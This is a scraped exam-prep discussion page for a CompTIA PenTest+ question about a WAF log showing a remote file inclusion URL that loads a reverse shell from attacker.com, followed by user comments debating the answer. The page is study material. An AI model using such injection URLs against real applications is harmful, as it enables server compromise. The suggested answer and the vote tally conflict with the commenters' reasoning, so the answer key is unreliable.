ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-001 All Questions

View all questions & answers for the PT0-001 exam
Go to Exam

Exam PT0-001 topic 1 question 51 discussion

Actual exam question from CompTIA's PT0-001
Question #: 51
Topic #: 1
[All PT0-001 Questions]

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?

  • A. Implement a blacklist.
  • B. Block URL redirections.
  • C. Double URL encode the parameters.
  • D. Stop external calls from the application.
Show Suggested Answer Hide Answer
Suggested Answer: B 🗳️
by AnAverageUser3656 at Nov. 6, 2019, 2:54 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
mr_robot
Highly Voted 5 years ago
PenTest+ Practice Tests Book - SYBEX B. - In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.
upvoted 8 times
...
boblee
Highly Voted 4 years, 10 months ago
its D. lol this is not a URL Redirection smh. sybex is such a shit book
upvoted 7 times
kamaluchi
3 years, 9 months ago
yep, its an RFI. but i still think the answer should be B. https://support.radware.com/app/answers/answer_view/a_id/1020413/~/appwall-protection-for-%E2%80%9Cunvalidated-redirect
upvoted 3 times
MrRiver
3 years, 7 months ago
yes guys Remote File Inclusion. So it is D, altough the wording is a bit off. You see that in the url that, the atter provided a url to a revershell ... passed to the Webserver als $phone variable ... This indicates that the $phone variable is not correctly validated and wrongly used in the web application
upvoted 1 times
...
...
...
kloug
Most Recent 2 years, 2 months ago
dddddddddd
upvoted 1 times
...
miabe
2 years, 9 months ago
Selected Answer: D
looks good to me
upvoted 1 times
...
alitosdavila
3 years, 5 months ago
Remote file inclusion attacks allow the attacker to go a step further and execute code that is stored on a remote server. These attacks are especially dangerous because the attacker can directly control the code being executed without having to first store a file on the local server. For example, an attacker might use this URL to execute an attack file stored on a remote server: http://www.mycompany.com/app.php?include=http://evil.attacker.com/attack.exe
upvoted 2 times
...
cvMikazuki
3 years, 6 months ago
ok D kot. sbb dia kata phone. so mst la call. Cohort 1-2021
upvoted 1 times
...
cvMikazuki
3 years, 6 months ago
B kot.... Cohort 1-2021
upvoted 1 times
...
versun
3 years, 10 months ago
OK, Maybe D is correct. But for this comptia exam, I need trust "SYBEX | PenTest+ Practice Test | Chapter 5 | Reporting and Communication | Question 123" even it is a shit book.
upvoted 2 times
versun
3 years, 10 months ago
SO , I choose B
upvoted 2 times
...
...
byrne
4 years, 4 months ago
The attacker is passing 'Phone' to the app, which is the revshell url. If we were talking about url redirections the attacker would be the one to be 'hacked'. In this case the app is following Phone -> bad url -> revshell.php, so as it ran the php code got hacked because question is saying 'successful attack'. Therefore, D, Stop external call (bad url).
upvoted 1 times
boooliyooo
3 years, 10 months ago
it's not a call.. but redirecting it to the badsite.. then a "call" may happen thereafter
upvoted 1 times
...
...
[Removed]
4 years, 8 months ago
URL redirection, also called URL forwarding, is a World Wide Web technique for making a web page available under more than one URL address. When a web browser attempts to open a URL that has been redirected, a page with a different URL is opened. Similarly, domain redirection or domain forwarding is when all pages in a URL domain are redirected to a different domain, as when wikipedia.com and wikipedia.net are automatically redirected to wikipedia.org.
upvoted 1 times
...
D1960
4 years, 10 months ago
Maybe it is D? This is going to set the Phone field to what seems to be a reverse shell application. This may not change the URL, but instead launch that application. Also, in some cases, there are good reasons to have URL redirects.
upvoted 1 times
...
jon34thna
5 years, 1 month ago
B. Block URL redirections. SYBEX | PenTest+ Practice Test | Chapter 5 | Reporting and Communication | Question 123
upvoted 4 times
...
AnAverageUser3656
5 years, 5 months ago
WRong it should be D.
upvoted 2 times
D1960
5 years, 1 month ago
Could you explain why you think so?
upvoted 2 times
...
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago